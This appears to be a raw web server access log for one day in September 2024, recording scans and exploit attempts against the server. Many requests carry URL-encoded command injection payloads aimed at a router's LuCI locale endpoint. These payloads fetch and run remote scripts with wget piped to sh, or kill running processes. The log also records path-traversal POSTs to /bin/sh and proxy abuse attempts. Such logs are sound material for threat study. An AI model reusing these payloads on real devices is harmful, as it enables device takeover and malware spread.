87.120.166.244 - - [29/Sep/2024:00:01:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 85.5.89.232 - - [29/Sep/2024:00:01:55 +0200] "GET / HTTP/1.0" 200 1895 185.224.128.83 - - [29/Sep/2024:01:07:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [29/Sep/2024:01:07:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 185.208.159.165 - - [29/Sep/2024:01:17:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.67.70 - - [29/Sep/2024:02:15:54 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 185.247.224.128 - - [29/Sep/2024:02:19:40 +0200] "GET / HTTP/1.1" 200 1895 91.238.181.32 - - [29/Sep/2024:02:22:12 +0200] "-" 400 1930 154.213.184.25 - - [29/Sep/2024:02:23:18 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 184.105.247.244 - - [29/Sep/2024:02:25:31 +0200] "GET / HTTP/1.1" 200 1895 184.105.247.235 - - [29/Sep/2024:02:26:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 184.105.247.235 - - [29/Sep/2024:02:26:35 +0200] "GET /?format=json HTTP/1.1" 200 1895 184.105.247.251 - - [29/Sep/2024:02:27:00 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 184.105.247.251 - - [29/Sep/2024:02:27:33 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 154.213.184.25 - - [29/Sep/2024:02:33:14 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.214.55.43 - - [29/Sep/2024:02:45:31 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 185.224.128.67 - - [29/Sep/2024:02:47:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 756 45.148.10.242 - - [29/Sep/2024:02:53:55 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 91.92.251.254 - - [29/Sep/2024:03:18:01 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 45.95.147.164 - - [29/Sep/2024:03:35:03 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 87.120.166.244 - - [29/Sep/2024:04:04:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.187.5 - - [29/Sep/2024:04:18:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 172.169.111.185 - - [29/Sep/2024:04:36:39 +0200] "-" 400 1930 154.213.184.25 - - [29/Sep/2024:05:10:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.184.15 - - [29/Sep/2024:05:32:46 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 185.224.128.59 - - [29/Sep/2024:05:32:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.59 - - [29/Sep/2024:05:32:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 95.214.27.169 - - [29/Sep/2024:05:40:57 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:05:40:57 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [29/Sep/2024:05:40:57 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:05:40:57 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 154.213.184.15 - - [29/Sep/2024:05:41:11 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 816 64.62.156.108 - - [29/Sep/2024:05:41:47 +0200] "-" 400 1930 174.138.61.44 - - [29/Sep/2024:05:46:20 +0200] "GET / HTTP/1.1" 200 1895 174.138.61.44 - - [29/Sep/2024:05:46:20 +0200] "-" 400 1930 185.224.128.83 - - [29/Sep/2024:05:46:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [29/Sep/2024:05:46:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 154.213.184.18 - - [29/Sep/2024:05:59:11 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 161.35.46.1 - - [29/Sep/2024:06:19:58 +0200] "-" 400 1930 147.185.132.141 - - [29/Sep/2024:06:23:24 +0200] "-" 400 1930 147.185.132.141 - - [29/Sep/2024:06:23:24 +0200] "-" 400 1930 185.224.128.67 - - [29/Sep/2024:06:29:30 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 756 154.213.184.25 - - [29/Sep/2024:07:02:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.84.89.2 - - [29/Sep/2024:07:05:37 +0200] "GET / HTTP/1.1" 200 1895 95.214.55.43 - - [29/Sep/2024:07:32:00 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 167.94.145.101 - - [29/Sep/2024:07:49:13 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.101 - - [29/Sep/2024:07:49:16 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.101 - - [29/Sep/2024:07:49:16 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.120.166.244 - - [29/Sep/2024:08:12:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 18.223.33.131 - - [29/Sep/2024:08:25:28 +0200] "GET / HTTP/1.1" 200 1895 3.10.24.69 - - [29/Sep/2024:08:36:12 +0200] "-" 400 1930 3.10.24.69 - - [29/Sep/2024:08:43:38 +0200] "-" 400 1930 3.10.24.69 - - [29/Sep/2024:08:59:11 +0200] "GET /favicon.ico HTTP/1.1" 404 729 95.214.27.169 - - [29/Sep/2024:09:20:09 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:09:20:09 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [29/Sep/2024:09:20:09 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:09:20:09 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.83 - - [29/Sep/2024:09:30:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [29/Sep/2024:09:30:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 185.224.128.52 - - [29/Sep/2024:09:38:53 +0200] "-" 400 1930 185.224.128.52 - - [29/Sep/2024:09:39:54 +0200] "GET /web/function/init.js HTTP/1.1" 404 746 3.10.24.69 - - [29/Sep/2024:09:47:00 +0200] "GET /index.html HTTP/1.1" 200 1895 176.28.138.193 - - [29/Sep/2024:09:48:35 +0200] "GET / HTTP/1.1" 200 1895 154.213.184.18 - - [29/Sep/2024:10:05:26 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.67 - - [29/Sep/2024:10:22:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 756 154.213.184.25 - - [29/Sep/2024:10:32:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.236.176.134 - - [29/Sep/2024:10:37:28 +0200] "GET / HTTP/1.1" 200 1895 164.92.159.97 - - [29/Sep/2024:10:37:40 +0200] "CONNECT www.qq.com:443 HTTP/1.1" 400 804 178.215.236.52 - - [29/Sep/2024:10:49:27 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 3.10.24.69 - - [29/Sep/2024:10:53:41 +0200] "-" 400 1930 45.148.10.242 - - [29/Sep/2024:11:01:06 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 98.80.4.104 - - [29/Sep/2024:11:02:27 +0200] "GET / HTTP/1.1" 200 1895 3.10.24.69 - - [29/Sep/2024:11:12:35 +0200] "-" 400 1930 154.213.187.241 - - [29/Sep/2024:11:16:18 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 179.43.133.162 - - [29/Sep/2024:11:34:40 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804 154.213.187.5 - - [29/Sep/2024:11:39:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 117.245.95.165 - - [29/Sep/2024:11:47:08 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740 117.245.95.165 - - [29/Sep/2024:11:47:08 +0200] "-" 400 1930 154.213.184.25 - - [29/Sep/2024:11:58:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.120.166.244 - - [29/Sep/2024:12:08:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.224.128.59 - - [29/Sep/2024:12:14:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.59 - - [29/Sep/2024:12:14:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 50.62.181.95 - - [29/Sep/2024:12:29:31 +0200] "REGISTER sip:157.90.17.105 null" 400 1841 50.62.181.95 - - [29/Sep/2024:12:32:49 +0200] "-" 400 1930 20.218.124.43 - - [29/Sep/2024:12:52:29 +0200] "GET /common/oauth2/v2.0/authorize HTTP/1.1" 404 758 95.214.55.43 - - [29/Sep/2024:12:57:57 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 185.224.128.52 - - [29/Sep/2024:13:26:43 +0200] "-" 400 1930 185.224.128.52 - - [29/Sep/2024:13:28:01 +0200] "GET /web/function/init.js HTTP/1.1" 404 746 79.137.198.113 - - [29/Sep/2024:13:33:47 +0200] "-" 400 1930 79.137.198.113 - - [29/Sep/2024:13:33:47 +0200] "-" 400 1930 79.137.198.113 - - [29/Sep/2024:13:33:47 +0200] "-" 400 1930 185.224.128.83 - - [29/Sep/2024:13:37:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [29/Sep/2024:13:37:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 154.213.184.18 - - [29/Sep/2024:13:54:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.67 - - [29/Sep/2024:14:05:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 756 103.186.101.138 - - [29/Sep/2024:14:09:53 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 66.132.153.56 - - [29/Sep/2024:14:14:42 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.56 - - [29/Sep/2024:14:14:45 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.56 - - [29/Sep/2024:14:14:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729 13.64.194.170 - - [29/Sep/2024:15:18:48 +0200] "GET / HTTP/1.1" 200 1895 154.213.184.25 - - [29/Sep/2024:15:23:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [29/Sep/2024:15:29:17 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:15:29:17 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [29/Sep/2024:15:29:17 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:15:29:17 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 78.108.177.50 - - [29/Sep/2024:15:33:11 +0200] "GET / HTTP/1.0" 200 1895 172.206.146.193 - - [29/Sep/2024:15:33:35 +0200] "-" 400 1930 176.123.1.244 - - [29/Sep/2024:15:43:58 +0200] "GET / HTTP/1.1" 200 1895 154.213.184.15 - - [29/Sep/2024:15:50:26 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 816 44.220.185.179 - - [29/Sep/2024:15:59:44 +0200] "GET / HTTP/1.1" 200 1895 87.236.176.143 - - [29/Sep/2024:16:08:53 +0200] "GET / HTTP/1.1" 200 1895 94.156.67.70 - - [29/Sep/2024:16:15:58 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.120.166.244 - - [29/Sep/2024:16:19:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.184.25 - - [29/Sep/2024:16:46:36 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.187.52 - - [29/Sep/2024:17:06:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.224.128.52 - - [29/Sep/2024:17:09:00 +0200] "-" 400 1930 185.224.128.52 - - [29/Sep/2024:17:09:58 +0200] "GET /web/function/init.js HTTP/1.1" 404 746 91.238.181.24 - - [29/Sep/2024:17:24:26 +0200] "-" 400 1930 101.36.117.15 - - [29/Sep/2024:17:27:56 +0200] "-" 400 1930 101.36.117.15 - - [29/Sep/2024:17:28:07 +0200] "GET / HTTP/1.1" 200 1895 101.36.117.15 - - [29/Sep/2024:17:28:25 +0200] "GET /favicon.ico HTTP/1.1" 404 729 101.36.117.15 - - [29/Sep/2024:17:28:26 +0200] "GET /robots.txt HTTP/1.1" 404 728 101.36.117.15 - - [29/Sep/2024:17:28:26 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 101.36.117.15 - - [29/Sep/2024:17:28:27 +0200] "GET /config.json HTTP/1.1" 404 729 95.214.55.43 - - [29/Sep/2024:17:37:19 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 185.224.128.67 - - [29/Sep/2024:17:43:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 756 185.224.128.59 - - [29/Sep/2024:17:53:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.59 - - [29/Sep/2024:17:53:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 154.213.184.25 - - [29/Sep/2024:17:55:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.224.128.83 - - [29/Sep/2024:18:04:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [29/Sep/2024:18:04:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 154.213.184.18 - - [29/Sep/2024:18:06:34 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 154.213.187.102 - - [29/Sep/2024:18:22:41 +0200] "GET / HTTP/1.1" 200 1895 79.137.198.113 - - [29/Sep/2024:18:34:29 +0200] "GET /covenantuser/login HTTP/1.1" 404 740 79.137.198.113 - - [29/Sep/2024:18:34:31 +0200] "GET /api/panelhash HTTP/1.1" 404 735 79.137.198.113 - - [29/Sep/2024:18:35:03 +0200] "GET /login HTTP/1.1" 404 723 50.62.181.95 - - [29/Sep/2024:18:35:04 +0200] "INVITE sip:011441519470845@157.90.17.105 null" 400 1841 79.137.198.113 - - [29/Sep/2024:18:35:05 +0200] "GET / HTTP/1.1" 200 1895 79.137.198.113 - - [29/Sep/2024:18:35:07 +0200] "GET /admin/console/index.html HTTP/1.1" 404 750 79.137.198.113 - - [29/Sep/2024:18:41:13 +0200] "POST /init HTTP/1.1" 404 722 79.137.198.113 - - [29/Sep/2024:18:41:13 +0200] "GET /new/login HTTP/1.1" 404 731 154.213.187.5 - - [29/Sep/2024:18:41:58 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 164.92.159.97 - - [29/Sep/2024:18:47:30 +0200] "CONNECT one.one.one.one:443 HTTP/1.1" 400 804 103.186.101.138 - - [29/Sep/2024:19:07:38 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 154.213.187.186 - - [29/Sep/2024:19:26:42 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.242 - - [29/Sep/2024:19:49:14 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 185.224.128.52 - - [29/Sep/2024:20:29:38 +0200] "-" 400 1930 185.224.128.52 - - [29/Sep/2024:20:30:31 +0200] "GET /web/function/init.js HTTP/1.1" 404 746 154.213.184.25 - - [29/Sep/2024:20:38:25 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 90.151.171.106 - - [29/Sep/2024:20:38:40 +0200] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 804 90.151.171.106 - - [29/Sep/2024:20:38:45 +0200] "-" 400 1930 90.151.171.106 - - [29/Sep/2024:20:38:51 +0200] "GET /?Z79065299362Q1 HTTP/1.1" 200 1895 90.151.171.106 - - [29/Sep/2024:20:38:56 +0200] "-" 400 1930 95.214.27.169 - - [29/Sep/2024:20:49:37 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:20:49:37 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [29/Sep/2024:20:49:37 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:20:49:37 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 87.120.166.244 - - [29/Sep/2024:21:08:16 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.224.128.83 - - [29/Sep/2024:21:42:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [29/Sep/2024:21:42:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 154.213.184.18 - - [29/Sep/2024:22:03:05 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 154.213.187.241 - - [29/Sep/2024:22:23:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 172.104.152.160 - - [29/Sep/2024:22:45:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 172.104.152.160 - - [29/Sep/2024:22:45:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F172.104.152.160%2Fbin+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 167.94.138.112 - - [29/Sep/2024:23:14:09 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.112 - - [29/Sep/2024:23:14:13 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.112 - - [29/Sep/2024:23:14:14 +0200] "GET /favicon.ico HTTP/1.1" 404 729 141.98.11.129 - - [29/Sep/2024:23:14:38 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:23:15:40 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:23:15:40 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [29/Sep/2024:23:15:40 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [29/Sep/2024:23:15:40 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.59 - - [29/Sep/2024:23:28:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.59 - - [29/Sep/2024:23:28:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 23.95.200.178 - - [29/Sep/2024:23:30:16 +0200] "GET / HTTP/1.1" 200 1895 154.213.187.52 - - [29/Sep/2024:23:32:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.184.15 - - [29/Sep/2024:23:38:45 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 816 147.185.132.70 - - [29/Sep/2024:23:58:22 +0200] "-" 400 1930 147.185.132.70 - - [29/Sep/2024:23:58:22 +0200] "-" 400 1930